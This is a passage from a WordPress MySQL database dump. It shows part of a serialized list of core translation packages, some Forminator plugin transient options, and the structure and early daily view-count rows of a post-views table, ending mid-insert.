17:22:06\";s:12:\"english_name\";s:9:\"Mongolian\";s:11:\"native_name\";s:12:\"Монгол\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.5.6/mn.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mn\";i:2;s:3:\"mon\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:2:\"mr\";a:8:{s:8:\"language\";s:2:\"mr\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-26 17:30:52\";s:12:\"english_name\";s:7:\"Marathi\";s:11:\"native_name\";s:15:\"मराठी\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/mr.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"mr\";i:2;s:3:\"mar\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"सुरु ठेवा\";}}s:5:\"ms_MY\";a:8:{s:8:\"language\";s:5:\"ms_MY\";s:7:\"version\";s:6:\"5.5.16\";s:7:\"updated\";s:19:\"2022-03-11 13:52:22\";s:12:\"english_name\";s:5:\"Malay\";s:11:\"native_name\";s:13:\"Bahasa Melayu\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/5.5.16/ms_MY.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ms\";i:2;s:3:\"msa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Teruskan\";}}s:5:\"my_MM\";a:8:{s:8:\"language\";s:5:\"my_MM\";s:7:\"version\";s:6:\"4.2.39\";s:7:\"updated\";s:19:\"2017-12-26 11:57:10\";s:12:\"english_name\";s:17:\"Myanmar (Burmese)\";s:11:\"native_name\";s:15:\"ဗမာစာ\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.2.39/my_MM.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"my\";i:2;s:3:\"mya\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:54:\"ဆက်လက်လုပ်ဆောင်ပါ။\";}}s:5:\"nb_NO\";a:8:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-27 04:25:37\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/nb_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nb\";i:2;s:3:\"nob\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsett\";}}s:5:\"ne_NP\";a:8:{s:8:\"language\";s:5:\"ne_NP\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-23 09:31:59\";s:12:\"english_name\";s:6:\"Nepali\";s:11:\"native_name\";s:18:\"नेपाली\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/ne_NP.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ne\";i:2;s:3:\"nep\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:43:\"जारी राख्नुहोस्\";}}s:5:\"nl_BE\";a:8:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-29 06:56:09\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/nl_BE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:12:\"nl_NL_formal\";a:8:{s:8:\"language\";s:12:\"nl_NL_formal\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-31 11:10:17\";s:12:\"english_name\";s:14:\"Dutch (Formal)\";s:11:\"native_name\";s:20:\"Nederlands (Formeel)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/6.8.2/nl_NL_formal.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nl_NL\";a:8:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-15 07:18:24\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/nl_NL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nl\";i:2;s:3:\"nld\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Doorgaan\";}}s:5:\"nn_NO\";a:8:{s:8:\"language\";s:5:\"nn_NO\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-03-18 10:59:16\";s:12:\"english_name\";s:19:\"Norwegian (Nynorsk)\";s:11:\"native_name\";s:13:\"Norsk nynorsk\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/nn_NO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"nn\";i:2;s:3:\"nno\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Hald fram\";}}s:3:\"oci\";a:8:{s:8:\"language\";s:3:\"oci\";s:7:\"version\";s:6:\"4.8.26\";s:7:\"updated\";s:19:\"2017-08-25 10:03:08\";s:12:\"english_name\";s:7:\"Occitan\";s:11:\"native_name\";s:7:\"Occitan\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/4.8.26/oci.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"oc\";i:2;s:3:\"oci\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Contunhar\";}}s:5:\"pa_IN\";a:8:{s:8:\"language\";s:5:\"pa_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-16 05:19:43\";s:12:\"english_name\";s:15:\"Panjabi (India)\";s:11:\"native_name\";s:18:\"ਪੰਜਾਬੀ\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/pa_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pa\";i:2;s:3:\"pan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:25:\"ਜਾਰੀ ਰੱਖੋ\";}}s:5:\"pl_PL\";a:8:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-20 12:00:49\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/pl_PL.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pl\";i:2;s:3:\"pol\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Kontynuuj\";}}s:2:\"ps\";a:8:{s:8:\"language\";s:2:\"ps\";s:7:\"version\";s:6:\"4.3.35\";s:7:\"updated\";s:19:\"2015-12-02 21:41:29\";s:12:\"english_name\";s:6:\"Pashto\";s:11:\"native_name\";s:8:\"پښتو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.3.35/ps.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ps\";i:2;s:3:\"pus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"دوام ورکړه\";}}s:5:\"pt_PT\";a:8:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-27 23:38:30\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/pt_PT.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_BR\";a:8:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-30 11:47:36\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/pt_BR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"pt\";i:2;s:3:\"por\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:5:\"pt_AO\";a:8:{s:8:\"language\";s:5:\"pt_AO\";s:7:\"version\";s:5:\"6.4.6\";s:7:\"updated\";s:19:\"2023-08-21 12:15:00\";s:12:\"english_name\";s:19:\"Portuguese (Angola)\";s:11:\"native_name\";s:20:\"Português de Angola\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.4.6/pt_AO.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:10:\"pt_PT_ao90\";a:8:{s:8:\"language\";s:10:\"pt_PT_ao90\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-27 23:48:59\";s:12:\"english_name\";s:27:\"Portuguese (Portugal, AO90)\";s:11:\"native_name\";s:17:\"Português (AO90)\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/translation/core/6.8.2/pt_PT_ao90.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"pt\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuar\";}}s:3:\"rhg\";a:8:{s:8:\"language\";s:3:\"rhg\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-16 13:03:18\";s:12:\"english_name\";s:8:\"Rohingya\";s:11:\"native_name\";s:8:\"Ruáinga\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/rhg.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"rhg\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"ro_RO\";a:8:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-17 09:56:52\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/ro_RO.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ro\";i:2;s:3:\"ron\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Continuă\";}}s:5:\"ru_RU\";a:8:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-10 08:22:10\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/ru_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ru\";i:2;s:3:\"rus\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продолжить\";}}s:3:\"sah\";a:8:{s:8:\"language\";s:3:\"sah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-21 02:06:41\";s:12:\"english_name\";s:5:\"Sakha\";s:11:\"native_name\";s:14:\"Сахалыы\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/sah.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"sah\";i:3;s:3:\"sah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Салҕаа\";}}s:3:\"snd\";a:8:{s:8:\"language\";s:3:\"snd\";s:7:\"version\";s:6:\"5.4.17\";s:7:\"updated\";s:19:\"2020-07-07 01:53:37\";s:12:\"english_name\";s:6:\"Sindhi\";s:11:\"native_name\";s:8:\"سنڌي\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/translation/core/5.4.17/snd.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"sd\";i:2;s:3:\"snd\";i:3;s:3:\"snd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"اڳتي هلو\";}}s:5:\"si_LK\";a:8:{s:8:\"language\";s:5:\"si_LK\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-12 06:00:52\";s:12:\"english_name\";s:7:\"Sinhala\";s:11:\"native_name\";s:15:\"සිංහල\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/si_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"si\";i:2;s:3:\"sin\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:44:\"දිගටම කරගෙන යන්න\";}}s:5:\"sk_SK\";a:8:{s:8:\"language\";s:5:\"sk_SK\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-22 08:56:02\";s:12:\"english_name\";s:6:\"Slovak\";s:11:\"native_name\";s:11:\"Slovenčina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/sk_SK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sk\";i:2;s:3:\"slk\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Pokračovať\";}}s:3:\"skr\";a:8:{s:8:\"language\";s:3:\"skr\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-04-24 16:58:02\";s:12:\"english_name\";s:7:\"Saraiki\";s:11:\"native_name\";s:14:\"سرائیکی\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.8.2/skr.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"skr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"جاری رکھو\";}}s:5:\"sl_SI\";a:8:{s:8:\"language\";s:5:\"sl_SI\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-14 09:44:53\";s:12:\"english_name\";s:9:\"Slovenian\";s:11:\"native_name\";s:13:\"Slovenščina\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/sl_SI.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sl\";i:2;s:3:\"slv\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Nadaljuj\";}}s:2:\"sq\";a:8:{s:8:\"language\";s:2:\"sq\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-04-18 09:38:51\";s:12:\"english_name\";s:8:\"Albanian\";s:11:\"native_name\";s:5:\"Shqip\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/sq.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sq\";i:2;s:3:\"sqi\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Vazhdo\";}}s:5:\"sr_RS\";a:8:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-08 20:51:20\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/sr_RS.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sr\";i:2;s:3:\"srp\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:14:\"Настави\";}}s:5:\"sv_SE\";a:8:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-08-10 20:44:58\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/sv_SE.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sv\";i:2;s:3:\"swe\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:9:\"Fortsätt\";}}s:2:\"sw\";a:8:{s:8:\"language\";s:2:\"sw\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-06-28 12:50:48\";s:12:\"english_name\";s:7:\"Swahili\";s:11:\"native_name\";s:9:\"Kiswahili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/sw.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"sw\";i:2;s:3:\"swa\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Endelea\";}}s:3:\"szl\";a:8:{s:8:\"language\";s:3:\"szl\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-24 19:58:14\";s:12:\"english_name\";s:8:\"Silesian\";s:11:\"native_name\";s:17:\"Ślōnskŏ gŏdka\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/szl.zip\";s:3:\"iso\";a:1:{i:3;s:3:\"szl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:13:\"Kōntynuować\";}}s:5:\"ta_IN\";a:8:{s:8:\"language\";s:5:\"ta_IN\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-27 03:22:47\";s:12:\"english_name\";s:5:\"Tamil\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/ta_IN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"தொடரவும்\";}}s:5:\"ta_LK\";a:8:{s:8:\"language\";s:5:\"ta_LK\";s:7:\"version\";s:6:\"4.2.39\";s:7:\"updated\";s:19:\"2015-12-03 01:07:44\";s:12:\"english_name\";s:17:\"Tamil (Sri Lanka)\";s:11:\"native_name\";s:15:\"தமிழ்\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/translation/core/4.2.39/ta_LK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ta\";i:2;s:3:\"tam\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"தொடர்க\";}}s:2:\"te\";a:8:{s:8:\"language\";s:2:\"te\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-26 15:47:39\";s:12:\"english_name\";s:6:\"Telugu\";s:11:\"native_name\";s:18:\"తెలుగు\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/te.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"te\";i:2;s:3:\"tel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:30:\"కొనసాగించు\";}}s:2:\"th\";a:8:{s:8:\"language\";s:2:\"th\";s:7:\"version\";s:6:\"5.8.11\";s:7:\"updated\";s:19:\"2022-06-08 04:30:30\";s:12:\"english_name\";s:4:\"Thai\";s:11:\"native_name\";s:9:\"ไทย\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.8.11/th.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"th\";i:2;s:3:\"tha\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:15:\"ต่อไป\";}}s:2:\"tl\";a:8:{s:8:\"language\";s:2:\"tl\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-08 16:09:09\";s:12:\"english_name\";s:7:\"Tagalog\";s:11:\"native_name\";s:7:\"Tagalog\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/tl.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tl\";i:2;s:3:\"tgl\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Magpatuloy\";}}s:5:\"tr_TR\";a:8:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-04-16 23:11:08\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/tr_TR.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tr\";i:2;s:3:\"tur\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Devam\";}}s:5:\"tt_RU\";a:8:{s:8:\"language\";s:5:\"tt_RU\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-20 20:20:50\";s:12:\"english_name\";s:5:\"Tatar\";s:11:\"native_name\";s:19:\"Татар теле\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/tt_RU.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"tt\";i:2;s:3:\"tat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:17:\"дәвам итү\";}}s:3:\"tah\";a:8:{s:8:\"language\";s:3:\"tah\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-06 18:39:39\";s:12:\"english_name\";s:8:\"Tahitian\";s:11:\"native_name\";s:10:\"Reo Tahiti\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/tah.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"ty\";i:2;s:3:\"tah\";i:3;s:3:\"tah\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:5:\"ug_CN\";a:8:{s:8:\"language\";s:5:\"ug_CN\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-18 21:39:23\";s:12:\"english_name\";s:6:\"Uighur\";s:11:\"native_name\";s:16:\"ئۇيغۇرچە\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/ug_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ug\";i:2;s:3:\"uig\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:26:\"داۋاملاشتۇرۇش\";}}s:2:\"uk\";a:8:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:3:\"6.8\";s:7:\"updated\";s:19:\"2025-04-18 21:10:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/translation/core/6.8/uk.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uk\";i:2;s:3:\"ukr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Продовжити\";}}s:2:\"ur\";a:8:{s:8:\"language\";s:2:\"ur\";s:7:\"version\";s:6:\"5.4.17\";s:7:\"updated\";s:19:\"2020-04-09 11:17:33\";s:12:\"english_name\";s:4:\"Urdu\";s:11:\"native_name\";s:8:\"اردو\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/5.4.17/ur.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ur\";i:2;s:3:\"urd\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:19:\"جاری رکھیں\";}}s:5:\"uz_UZ\";a:8:{s:8:\"language\";s:5:\"uz_UZ\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-02-28 12:02:22\";s:12:\"english_name\";s:5:\"Uzbek\";s:11:\"native_name\";s:11:\"O‘zbekcha\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/uz_UZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uz\";i:2;s:3:\"uzb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Davom etish\";}}s:2:\"vi\";a:8:{s:8:\"language\";s:2:\"vi\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-09-01 09:12:13\";s:12:\"english_name\";s:10:\"Vietnamese\";s:11:\"native_name\";s:14:\"Tiếng Việt\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.8.2/vi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"vi\";i:2;s:3:\"vie\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Tiếp tục\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-16 04:41:52\";s:12:\"english_name\";s:16:\"Chinese (Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_HK\";a:8:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:5:\"6.2.7\";s:7:\"updated\";s:19:\"2022-07-15 15:25:03\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:12:\"香港中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.2.7/zh_HK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"6.8.2\";s:7:\"updated\";s:19:\"2025-07-29 06:55:14\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.8.2/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}}','off'),
(98966,'_transient_timeout_forminator_general_data_protection_cleanup','1758706167','off'),
(98967,'_transient_forminator_general_data_protection_cleanup','1','off'),
(98968,'_transient_timeout_forminator_daily_cron','1758706167','off'),
(98969,'_transient_forminator_daily_cron','1','off'),
(98970,'_transient_timeout_forminator_send_export','1758706167','off'),
(98971,'_transient_forminator_send_export','1','off'),
(98972,'_transient_timeout_forminator_process_report','1758706167','off'),
(98973,'_transient_forminator_process_report','1','off'),
(98974,'_transient_timeout_forminator_action_scheduler_cleanup','1758706167','off'),
(98975,'_transient_forminator_action_scheduler_cleanup','1','off'),
(98989,'_site_transient_timeout_wp_theme_files_patterns-6d0104c7bdd35ab39404d08c8db6536a','1758702568','off'),
(98990,'_site_transient_wp_theme_files_patterns-6d0104c7bdd35ab39404d08c8db6536a','a:2:{s:7:\"version\";s:5:\"2.5.9\";s:8:\"patterns\";a:0:{}}','off');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_post_views`
--

DROP TABLE IF EXISTS `wp_post_views`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_post_views` (
  `id` bigint(20) unsigned NOT NULL,
  `type` tinyint(1) unsigned NOT NULL,
  `period` varchar(8) NOT NULL,
  `count` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`type`,`period`,`id`),
  UNIQUE KEY `id_type_period_count` (`id`,`type`,`period`,`count`) USING BTREE,
  KEY `type_period_count` (`type`,`period`,`count`) USING BTREE
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_post_views`
--

LOCK TABLES `wp_post_views` WRITE;
/*!40000 ALTER TABLE `wp_post_views` DISABLE KEYS */;
INSERT INTO `wp_post_views` VALUES
(66,0,'20240807',1),
(95,0,'20240807',1),
(506,0,'20240807',1),
(14,0,'20240807',3),
(355,0,'20240807',4),
(362,0,'20240808',1),
(459,0,'20240808',1),
(469,0,'20240808',1),
(476,0,'20240808',1),
(484,0,'20240808',1),
(650,0,'20240808',1),
(680,0,'20240808',1),
(703,0,'20240808',1),
(712,0,'20240808',1),
(716,0,'20240808',1),
(741,0,'20240808',1),
(748,0,'20240808',1),
(708,0,'20240808',2),
(700,0,'20240808',3),
(14,0,'20240808',13),
(741,0,'20240809',1),
(771,0,'20240809',1),
(776,0,'20240809',1),
(780,0,'20240809',1),
(784,0,'20240809',3),
(14,0,'20240809',4),
(496,0,'20240810',1),
(542,0,'20240810',1),
(546,0,'20240810',1),
(563,0,'20240810',1),
(566,0,'20240810',1),
(605,0,'20240810',1),
(609,0,'20240810',1),
(643,0,'20240810',1),
(650,0,'20240810',1),
(656,0,'20240810',1),
(14,0,'20240810',3),
(14,0,'20240811',9),
(708,0,'20240812',1),
(741,0,'20240812',1),
(14,0,'20240812',2),
(680,0,'20240813',1),
(700,0,'20240813',1),
(703,0,'20240813',1),
(712,0,'20240813',1),
(716,0,'20240813',1),
(748,0,'20240813',1),
(771,0,'20240813',1),
(776,0,'20240813',1),
(784,0,'20240813',1),
(810,0,'20240813',1),
(780,0,'20240813',2),
(14,0,'20240813',8),
(703,0,'20240814',2),
(14,0,'20240814',7),
(643,0,'20240815',1),
(703,0,'20240815',1),
(824,0,'20240815',1),
(828,0,'20240815',2),
(836,0,'20240815',2),
(851,0,'20240815',2),
(855,0,'20240815',2),
(840,0,'20240815',3),
(859,0,'20240815',3),
(831,0,'20240815',4),
(14,0,'20240815',5),
(469,0,'20240816',1),
(643,0,'20240816',1),
(700,0,'20240816',1),
(708,0,'20240816',1),
(484,0,'20240816',2),
(14,0,'20240816',9),
(362,0,'20240817',1),
(469,0,'20240817',1),
(506,0,'20240817',1),
(605,0,'20240817',1),
(609,0,'20240817',1),
(708,0,'20240817',1),
